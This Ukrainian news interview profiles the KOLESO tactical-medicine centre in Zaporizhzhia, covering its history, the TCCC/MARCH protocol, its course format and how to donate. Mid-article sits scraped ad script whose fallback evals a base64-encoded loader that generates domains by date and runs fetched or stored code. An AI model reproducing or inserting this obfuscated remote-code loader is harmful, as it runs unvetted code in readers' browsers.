З початку
повномасштабного вторгнення РФ в Україні як ніколи набрало актуальності питання
знання базових правил надання домедичної допомоги та вміння використовувати цей
досвід на практиці: у сучасних реаліях такі навички стали вкрай важливими не тільки для військових, а й для цивільних громадян.
Журналісти Порталу Акцент побували у навчально-тренувальному Центрі тактичної медицини «КОЛЕСО» у Запоріжжі та поспілкувалися з його керівником Олексієм Засобою, який детально розповів про історію заснування та діяльність волонтерського центру, про методику викладання тактичної медицини та важливість її вивчення для громадян.
Розкажіть про історію заснування волонтерського центру в Україні та Запоріжжі зокрема.
— У кінці березня був заснований перший центр в Україні – у місті Київ, а на сьогоднішній день пройшло навчання вже близько дванадцяти тисяч людей. Це буквально в одному центрі у Києві. Потім, другий центр був відкритий у Старичах, але після обстрілу була знищена будівля, третій – у Запоріжжі: перші заняття розпочалися 30 серпня. Скоро будуть відкриті ще два центри – у Вінниці та Кривому Розі.
Олексій Засоба. Фото: Портал Акцент
Цікаво дізнатися про методику викладання тактичної медицини у «КОЛЕСІ»: наскільки високою є її ефективність та чому саме вона була обрана для підготовки?
— Ми проводимо навчання за натівським протоколом ТС-3, або ТССС (TacticalCombatCasualtyCare – ред.) – це дуже потужний протокол, послідовність дій при первинній допомозі. Є різні рівні: зараз ми викладаємо ASM – це перший рівень для військовослужбовців та цивільних осіб, що проживають у зоні ведення бойових дій, але є і наступні рівні – вже для бойових медиків, для людей з медичною освітою. У протоколі ТССС є алгоритм «MARCH» – це мнемонічний ряд, який допомагає запамятати вірну послідовність дій домедичної допомоги. Наприклад, «M» — «massive bleeding» (масивна кровотеча), далі «А» — «airway» (дихальні шляхи), «R» — «resparation» (дихання – ред.), «С» — «circulation» (циркуляція – ред.), і «H» — гіпотермія. Для того, щоб легше було використовувати цей акронім у стресових ситуаціях на передовій, Ольгою Омельчук (засновниця ГО «Колесо» — ред.) у 2015 році було придумано українську заміну мнемоніки таким словом, як «КОЛЕСО» — приголосні букви цього слова означають «кров», «легені» та «серце». І українцям легше запам’ятати та у стресовій ситуації відтворити саме цю мнемоніку, аніж перекладати слова «MARCH». Обидва терміни – ідентичні алгоритми, але «КОЛЕСО» адаптований для українських військових і легший для сприйняття. І в 2015 році ця мнемоніка була затверджена Міноборони України і має офіційний статус. І зараз ми за нею навчаємо людей.
Як проводиться підготовка та скільки триває курс?
— Один курс триває п’ять – п’ять з половиною годин, ми працюємо з 9:00 до 14:00 або 14:30. Спочатку у нас проходить демонстрація, де ми в одному залі збираємо всіх відвідувачів і розповідаємо, чим ми будемо займатися протягом п’яти годин — тобто, коротко презентуємо нашу роботу. Потім ми розділяємося на чотири групи і вони розходяться по базам: тактика-евакуація, кров, легені, серце.
Наскільки важливо вивчати основу тактичної медицини цивільним людям?
— Ми вважаємо, що це надважливо, особливо в такі буремні часи, тому що коли трапляються, скажімо так, якийсь випадок, пов’язаний з пораненням, зазвичай людина при втраті крові може загинути буквально за дві-три хвилини. Якщо біля цієї людини опиниться той, хто знає, що робити у таких випадках, він зможе врятувати цю людину. Тобто, протягом перших десяти хвилин, наприклад, медика або швидкої не буде поруч, а це вкрай критичний термін, коли треба вміти зупинити кров і відновити дихання людини. Якщо людина, яка проходила курси вміє цим користуватися і вона на практиці відтворить це все, то вона врятує поранену людину і дочекається медиків. Це не обов’язково може бути вогнепальне чи осколкове поранення – це може бути ДТП або епілепсія: ми теж розглядаємо такі варіанти. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Розкажіть про роботу волонтерів центру.
— Наші інструктори – це діючі запорізькі лікарі, більшість з них до центру «КОЛЕСО» займалися волонтерством. Тут ми продовжуємо займатися цією ж справою – допомагаємо військовим та бойовим медикам, які проходять навчання – ліками, аптечками, рюкзаками. На нас звертають увагу міжнародні гуманітарні фонди, які слідкують за нашою діяльністю та починають нам довіряти і знають, що частину тих речей, які вони нам надішлють, ми використаємо для навчання, а частину можемо передавати на військові потреби. Так було вже десь три-чотири рази: ми робили серйозні передачі.
Волонтери центру та їх робота. Фото: Портал Акцент та Facebook-сторінка центру «КОЛЕСО»
Також варто додати, що в найближчих планах мережі волонтерських центрів є розбудова партнерства з
великими підприємствами різної форми власності, які мають бути зацікавлені в
навчанні своїх працівників — від промислових виробництв до силових структур, а
також впровадження курсу, адаптованого для дітей.
Детальніше ознайомитися з діяльністю навчально-тренувального центру з надання тактичної медицини можна «КОЛЕСО» можна на сторінках центру у Facebook та Instagram.
«Навчально-тренувальний центр КоЛеСо проводить щоденний курс з домедичноі допомоги для військових та цивільних — безкоштовно для всіх! Центр можна підтримати донатами, завдяки небайдужим людям він функціонує і розвивається. Частина коштів йде на закупівлю медичних розхідників: турнікетів, бандажів, еластичних бинтів, термоковдр, карематів, муляжів. Допомогти «Колесо» може будь-хто», — йдеться в описі.
Громадська організація «КоЛеСо» м. Запоріжжя.
Код одержувача ЄДРПОУ 44818193.
Рахунок отримувача IBAN: UA803052990000026008026227486
Назва банку: АТ КБ «ПриватБанк». Призначення платежу: благодійний внесок
Тематичне зображення — Портал Акцент. (adsbygoogle = window.adsbygoogle || []).push({});
Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/kerivnik-tsentru-taktmedu-koleso-u-zaporizhzhi-oleksij-zasoba-pro-te-yak-projti-navchannya-ta-chomu-tse-vazhlivo-foto/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook